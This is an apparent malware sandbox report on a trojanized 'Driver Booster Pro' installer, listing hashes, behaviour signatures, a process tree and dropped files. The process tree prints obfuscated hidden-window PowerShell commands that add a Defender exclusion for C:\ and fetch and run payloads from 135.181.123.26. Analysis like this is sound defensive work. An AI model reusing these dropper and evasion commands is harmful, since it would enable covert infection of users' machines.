Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 00:56

General

  • Target

    DriverBoosterPro.exe

  • Size

    30.8MB

  • MD5

    0d53802cb56260bfe67619aabfa4974f

  • SHA1

    21375855ea1f0cf5fe8147a70031a44a626e0b07

  • SHA256

    24f24ab0484ba98c79a49459178ea40ca2fecc54100cd913c7eff730be962290

  • SHA512

    25c8930c2ec97a55d715ce5990c0ea6f1b3b266fbc20a9d012c2a7ead0d06345e4dcb85fac97ac678ab7d261e5241a5922841966df63ba8ae51b326af642c8b7

  • SSDEEP

    393216:01NpF9ID9b3Mj4sVC3Z+dV+fOcaZ5xlux+Gd3nHGaTamTDWeMAQtJxKP+:0CD5FsCc44GZHrTFSFJKP+

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://135.181.123.26/sccp32.dll

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://135.181.123.26/rundll32.bat

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Modifies Windows Firewall 2 TTPs 6 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe
    "C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Users\Admin\AppData\Local\Temp\is-MUDGM.tmp\DriverBoosterPro.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MUDGM.tmp\DriverBoosterPro.tmp" /SL5="$A02C6,31312389,996352,C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3548
      • C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\Driver.Booster.10.0.0.65.exe
        "C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\Driver.Booster.10.0.0.65.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Users\Admin\AppData\Local\Temp\is-C6PJR.tmp\Driver.Booster.10.0.0.65.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-C6PJR.tmp\Driver.Booster.10.0.0.65.tmp" /SL5="$3027A,29414238,361472,C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\Driver.Booster.10.0.0.65.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3512
          • C:\Windows\SysWOW64\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im ScanWinUpd.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1416
          • C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe
            "C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe" /brandname
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1680
          • C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
            "C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" /skipuac
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            PID:1832
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill" /f /im DriverBooster.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3136
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3492
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2568
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Booster" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe" enable=yes
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:672
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Booster" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe" enable=yes
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1964
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe" enable=yes
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4960
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe" enable=yes
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2252
          • C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
            "C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2332
            • C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe
              "C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe" /brandname
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:924
            • C:\Program Files (x86)\IObit\Driver Booster\Manta.exe
              "C:\Program Files (x86)\IObit\Driver Booster\Manta.exe" /CommStat /DoCommStat /Code="a602" /Days=0
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:216
            • C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
              "C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe" /main /App=db10 /MainHwnd=0
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:4772
              • C:\Program Files (x86)\IObit\Driver Booster\rma.exe
                "C:\Program Files (x86)\IObit\Driver Booster\rma.exe" /run /auto
                7⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1836
            • C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe
              "C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe" /cnt
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3624
            • C:\Program Files (x86)\IObit\Driver Booster\Manta.exe
              "C:\Program Files (x86)\IObit\Driver Booster\Manta.exe" /CommStat /DoCommStat /Code="A100" /Days=0
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:8
            • C:\Program Files (x86)\IObit\Driver Booster\Manta.exe
              "C:\Program Files (x86)\IObit\Driver Booster\Manta.exe" /CommStat /DoCommStat /Code="B100" /Days=7
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1248
            • C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe
              "C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe" /stat
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:924
            • C:\Program Files (x86)\IObit\Driver Booster\SetupHlp.exe
              "C:\Program Files (x86)\IObit\Driver Booster\SetupHlp.exe" /afterupgrade
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4528
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\WoodBdoor\main.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4264
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex alLSigNeD -NOl -w hIdDEn -EC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXAAnACkA
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4688
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex ALlsIgned -nOnI -W HIdDEN -eC IAAJACgAIAAuACgAJwBOAGUAdwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwAtAE8AQgBKAGUAYwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAoACAAWwBDAGgAQQByAF0AIAAJADEAMQAwACAACQAgAAkAKwAgAAkAWwBjAGgAYQBSAF0AIAAJADYAOQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQA4ADQAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQByAF0AIAAJADgANwAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQAxADAAMQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA2ADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANgA3ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMAA4ACAACQAgAAkAKwAgAAkAWwBjAEgAYQByAF0AIAAJADEAMAA1ACAACQAgAAkAKwAgAAkAWwBjAEgAQQByAF0AIAAJADEAMAAxACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADcAOAAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANgAgAAkAIAApACAACQApAC4AKAAgAAkAWwBDAEgAQQBSAF0AIAAJADYAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQAxADEAMQAgAAkAIAAJACsAIAAJAFsAYwBIAEEAUgBdACAACQA4ADcAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAxADAAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkAMQAwADgAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkANwA5ACAACQAgAAkAKwAgAAkAWwBjAEgAYQByAF0AIAAJADkANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA2ADgAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkAMQAwADIAIAAJACAACQArACAACQBbAEMAaABBAHIAXQAgAAkAMQAwADUAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkANwA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMAAxACAACQAgACkALgBJAG4AdgBvAGsAZQAoACAAHSBoAHQAdABwADoALwAvADEAMwA1AC4AMQA4ADEALgAxADIAMwAuADIANgAvAHMAYwBjAHAAMwAyAC4AZABsAGwAHSAgACwAIAAJAB0gJABlAE4AdgA6AGEAbABMAHUAUwBFAHIAUwBwAFIATwBGAGkAbABlAFwAcwBjAGMAcAAzADIALgBkAGwAbAAdICAAIAApACAAIAA7ACAAJgAgACAAHSAkAGUATgB2ADoAYQBsAGwAVQBzAGUAcgBTAFAAcgBvAEYASQBMAEUAXABzAGMAYwBwADMAMgAuAGQAbABsAB0g
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1428
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex ALLSIGned -NoNI -w hIdden -eC IAAJACgAIAAuACgAJwBOAGUAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACcAdwAtAE8AQgBKACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAEUAQwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAJACgAIABbAEMAaABBAHIAXQAgADcAOAAgACAAKwAgAFsAYwBIAGEAcgBdACAANgA5ACAAIAArACAAWwBjAGgAQQByAF0AIAAxADEANgAgACAAKwAgAFsAQwBIAGEAcgBdACAANAA2ACAAIAArACAAWwBDAEgAYQByAF0AIAAxADEAOQAgACAAKwAgAFsAYwBIAGEAUgBdACAAMQAwADEAIAAgACsAIABbAGMAaABhAHIAXQAgADkAOAAgACAAKwAgAFsAYwBoAEEAcgBdACAAOQA5ACAAIAArACAAWwBDAEgAYQBSAF0AIAAxADAAOAAgACAAKwAgAFsAYwBIAEEAcgBdACAANwAzACAAIAArACAAWwBjAEgAQQBSAF0AIAAxADAAMQAgACAAKwAgAFsAQwBoAEEAcgBdACAAMQAxADAAIAAgACsAIABbAEMAaABBAHIAXQAgADEAMQA2ACAAIAAgACkAIAAgACkALgAoACAACQBbAGMAaABhAFIAXQAgAAkANgA4ACAACQAgAAkAKwAgAAkAWwBDAGgAQQBSAF0AIAAJADEAMQAxACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADgANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA3ADgAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkANwA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMQAxACAACQAgAAkAKwAgAAkAWwBjAGgAYQBSAF0AIAAJADYANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAUgBdACAACQA2ADgAIAAJACAACQArACAACQBbAEMAaABhAFIAXQAgAAkAMQAwADIAIAAJACAACQArACAACQBbAEMAaABhAFIAXQAgAAkAMQAwADUAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAwADgAIAAJACAACQArACAACQBbAGMASABBAHIAXQAgAAkAMQAwADEAIAAJACAAKQAuAGkATgBWAG8AawBFACgAIAAJAB0gaAB0AHQAcAA6AC8ALwAxADMANQAuADEAOAAxAC4AMQAyADMALgAyADYALwByAHUAbgBkAGwAbAAzADIALgBiAGEAdAAdICAALAAgAB0gJABFAG4AVgA6AEEAbABsAHUAUwBlAHIAUwBQAFIAbwBGAGkAbABlAFwAcgB1AG4AZABsAGwAMwAyAC4AYgBhAHQAHSAgAAkAKQAgACAAOwAgAAkAJgAgACAAHSAkAEUATgBWADoAQQBsAGwAVQBzAGUAcgBTAHAAcgBvAEYAaQBsAGUAXAByAHUAbgBkAGwAbAAzADIALgBiAGEAdAAdIA==
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1436

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\IObit\Driver Booster\DataState.dll

    Filesize

    76KB

    MD5

    58a6585063cefdf0056bbe916f99bca7

    SHA1

    59c297cf44dc16f4b8db062438aaa6326756e215

    SHA256

    9f5415b13694a5030af53673844b62ffdb3246d213946edc2f491b8b81fdca35

    SHA512

    7bee78f10e563a44975dfe3dd59e54954feb2edded32502d6d4fdec0fd7e6125939af2ea67bb54884aafb963a244aac923059e9646ef2f0b526cc6056cfb2505

  • C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe

    Filesize

    8.5MB

    MD5

    4ca43174dd3a2b2a094e92f206de0113

    SHA1

    bc41829b4b9e1e0705e5f33f10866cf64abbf6df

    SHA256

    2d5890715b088454329fff78ce75aeae530083f6a1a12ba101a91deda66b7d68

    SHA512

    824f317a8144de66b4f9c07d6bcbd5919b035214f5bf2e2407f0180f2b04b270617de6b1fd5df2110bf67c30da906a822d22eb1f8d32a2763ce038373d5c2e47

  • C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe

    Filesize

    172KB

    MD5

    31942fc22a38dcf41a331fe66113b6b6

    SHA1

    6cc1ee3ab64ef3bb78359fb7e39e4013f17c3a24

    SHA256

    5cf6f5c1e232070a8a84c3a6eecaff5631d530ac8836ba86f6f61aeefc1a4fb7

    SHA512

    2cd9a3fb9b2962744ed45aa5d2c7cdb349dd31dacb9fd8497aeed22aa3bdc84e6b83d25c190254696d9f9c0e7452023532d8bec0bd1c723e58bf97edc27f442f

  • C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO32.dll

    Filesize

    1.2MB

    MD5

    e937e1a411075768ef3f287f9abc128a

    SHA1

    ee63928100563c1d846ecdc462a5c163ecce3d4c

    SHA256

    cb81c7cbd229b639f24db6655edc67f4c32954778d24e086d45a7229cc58351c

    SHA512

    a8a6123e1b88d3708ae76ab1ea2d3f15549d03549ee07fdf935357d06792fe63cceae7034e250588415040b8e11b0e892016bba165c488068c6c48f4cc7726a5

  • C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-0O61B.tmp

    Filesize

    1KB

    MD5

    a364eb8919ad57f2278960cf6a062862

    SHA1

    dd7fa8dd5894960fa47e8c74e2acec034da803d3

    SHA256

    ac4531a4b4fe3b34054eb33f2caabe2776be0ea5fc5056670c139caffd51b4f4

    SHA512

    68e06dcbf244211caac4e386bc73856a7b4da97681e58de3470d6f1000abd336c2d13c84ee11e2bcda9a48afd176efc34f9567ef3bebd5577731956402ead96b

  • C:\Program Files (x86)\IObit\Driver Booster\Manta.exe

    Filesize

    899KB

    MD5

    6b11a86159bf6b8654f337da6bd36203

    SHA1

    48d3309db3ea970e48ab68ea177164161826a537

    SHA256

    a235ec0a6ffe9c608ae0d552611ab0b93401e81d2d5d5972c2f4fd1b49311816

    SHA512

    bd581eede1723208647c749e07df6216714c60e98c5858c634317afc91a2747e7f431e8c3bf812872286f591f64319cbd3dc57fedb9d4060886612ce74663e8b

  • C:\Program Files (x86)\IObit\Driver Booster\PowerMgr.dll

    Filesize

    74KB

    MD5

    97e4583b419b09292a71f05c2b8f9005

    SHA1

    68fd4b484ae97977334f64f6423feeb1d0e38d71

    SHA256

    89fbf0385e5a853dbc0b21a658ff426c60e95a9671499d9f6ed271ea32fdfe2b

    SHA512

    04b41717c4e63b9daa0a5440430e92e6aa20ad2119c5727002e818e828ce63633cb18f1f831a507788ccabc71ca98c76d052764c4712e0a568d23ae39522dca5

  • C:\Program Files (x86)\IObit\Driver Booster\ProductNews2.dll

    Filesize

    2.2MB

    MD5

    77835be08d6575eb0ad2e046c2f99a29

    SHA1

    0f615e0ff54202e172fb9ea619eae297d6c3239c

    SHA256

    0ae55b05a42fdf65c068b0f702740ba4a9600e081166b0b9be427cd0b28ddc53

    SHA512

    bf7b3f09cd7ff3c7055aeda3d4663a7bf3bf6c8ee53d84039d373af27806ba28f6ddacb5f3bbae5c106618b64ba807a6542a49e1e27736a78927ce152c94e360

  • C:\Program Files (x86)\IObit\Driver Booster\Pub

    Filesize

    3B

    MD5

    a29bdd003ef6c0c34279807341f450f2

    SHA1

    6b4946e00d30de81d760e19a5aeb39b57388cfbc

    SHA256

    352ae8779866cf74268d18978490bd4a4f4d2294ff2544ebe983f80ae8f625be

    SHA512

    1c88e347a1b93fa70c2f749518b1383c1750b36a6ce34b39a3bed6fb67d9bcc6521fcd8d6b1e505fbfec0d42e4e74b475744427c573f5d3b1736f988a4cd4fa0

  • C:\Program Files (x86)\IObit\Driver Booster\ScanData\scan.dat

    Filesize

    130B

    MD5

    70df5c34fd3bc550b80bb0df7811ad62

    SHA1

    a356d36cd50d71539d9699ac12d76fd97b8931f2

    SHA256

    a9c5e2c5aad2a658cf843e4ec3cc91429baf83fc89fcf0e138f6a93ea1475fd6

    SHA512

    7a386a9fd66383f5fc0380702e09ae18ca2487773582066cf10773ae22aa4246b260707a04674e78a43656e9bc631f007ddcd1853530eb52689e4fd9527b91db

  • C:\Program Files (x86)\IObit\Driver Booster\SysRest.dll

    Filesize

    109KB

    MD5

    f89f40f77a1f06767291db02b0f5ec90

    SHA1

    d03845a94156c992532636066ecc781fa7b51cf5

    SHA256

    f114758b34b099510877d9861a44b860de99a70671f709b4ac27f8d5d115bc9b

    SHA512

    9d9d07a731dfb375bab05b7df8cd460998f4ba1741e60b8309c972702e908a489a12b3caea16b787f5efdfc2bffb35e4735388ceee84344c4b75f169caf70086

  • C:\Program Files (x86)\IObit\Driver Booster\WebRes.dll

    Filesize

    884KB

    MD5

    e3e9e1b72b88036576997e0d3073dc43

    SHA1

    ef408a7403a67a9f28cab0d76e8d23763feaea49

    SHA256

    d30e85e69d6eb38dd483da5d958b72654421660b2159e7371e4505174ea9d546

    SHA512

    5ab36f5d97c28f8b67cf68960f4b66af92a3a33c82c10304b37e80f85923072f5bea6d85bad1c3d28f4e3fc1d93751fa7c4060978ed2a87d70598108a2544e48

  • C:\Program Files (x86)\IObit\Driver Booster\Zip.dll

    Filesize

    581KB

    MD5

    72788a1fb246c3240d8afc55c3c9edb3

    SHA1

    879f54ecfec7df093b1b8db971ef930a313c75c8

    SHA256

    e5fa55578595d3a2e7dfc20a0ab4aa10f880f91ff606225f91d4765b395d0fa5

    SHA512

    13c3c22bb82e290f165b33387f132fd0632b235caae017aadeeb6e31384fec66f4615c2f514b7c98979b682d97ae63636f8a2621ef07fbf2801d152becf50fc6

  • C:\Program Files (x86)\IObit\Driver Booster\madBasic_.bpl

    Filesize

    210KB

    MD5

    4eec85a1cdd7956c538d2a9c239e0821

    SHA1

    46a7ae1459bebfe5dae8e05512ce8924684e97a2

    SHA256

    2320f3b9dfbf5fcc341eedc621deb344dd05379e258bf38c68fde021f5ffc444

    SHA512

    c8c1bac703cafe5713935dd97a4488be70927ad27558778386abb8525abdbb692c1bd4bd912ebb5f5a1b550f1735bdd8b06c947b713f20f14e9c4aae5e507f35

  • C:\Program Files (x86)\IObit\Driver Booster\madDisAsm_.bpl

    Filesize

    63KB

    MD5

    28077f95f05a59c719896b2b99c128c3

    SHA1

    139ca8c108e5cb8e47dc1bd462070aab41c1c495

    SHA256

    523a0533146976349231ddd9c59b0ac3bd85622031bfed06eabf7d7f779d5069

    SHA512

    4b2e2156efc46d89c9a48fff75ff214bd82b33ab4a1149c5598755b06a7c09f8a9432deef15e03bf6401a9a60eaac09cd9692e592fbbf090dd2c20db28fd2449

  • C:\Program Files (x86)\IObit\Driver Booster\madExcept_.bpl

    Filesize

    436KB

    MD5

    d9478c2025bc22669005ac356fb78043

    SHA1

    0c1d93510c6a9ef876d23d57cd2e722751905ba9

    SHA256

    2a4dbe3f771523d48b46878b2abed6ef75f0c2413bbba5e9b89d417bc39417ae

    SHA512

    fec82637a41ced07d7a626c8ec31cee49616caceca01e6bb09d440c2a1c0288afe6c64a65bb887babd220d9db478f451016b30c74035479edaa16c719bf73adf

  • C:\Program Files (x86)\IObit\Driver Booster\rtl120.bpl

    Filesize

    1.1MB

    MD5

    817b7f996c01ba29287da880fc0cd036

    SHA1

    1f19e486d44632cf923d6b48957a65e7499d024c

    SHA256

    4c8d6bf4eaeaf516f39b7be0f84d92fa9723f4ea98e8468538b239a660350a57

    SHA512

    3998d258018d4c0e4ca971cff5a3cf449f11725ddcba63af47e1a4e77f28766950658dbab35ce06fa1f85a4cf7a96d2e72825593f609090c47e31df66c95a0af

  • C:\Program Files (x86)\IObit\Driver Booster\sqlite3.dll

    Filesize

    906KB

    MD5

    a7a126f279f636b1c105f3713b558516

    SHA1

    e300ddd57b00a7e1e0bc793d31cb2b0096e0a5dc

    SHA256

    a6e09723178f3168aee3f230d1e4a112593f150a9855820a1935a1cd16e9b0bc

    SHA512

    420bb1cc42773ac817c748964827a6cf93f1b3ea2fe98ca86274e37816f429fd70883ea27c8e8e1c55353c1a38d5eb270f7083fda6d3a17b6f1f7010b0b3c3a8

  • C:\Program Files (x86)\IObit\Driver Booster\vcl120.bpl

    Filesize

    1.9MB

    MD5

    666e55179fc1388796355b87317f8be8

    SHA1

    a42473a36ae7fbbe220ed5b68db5051ec5d55e58

    SHA256

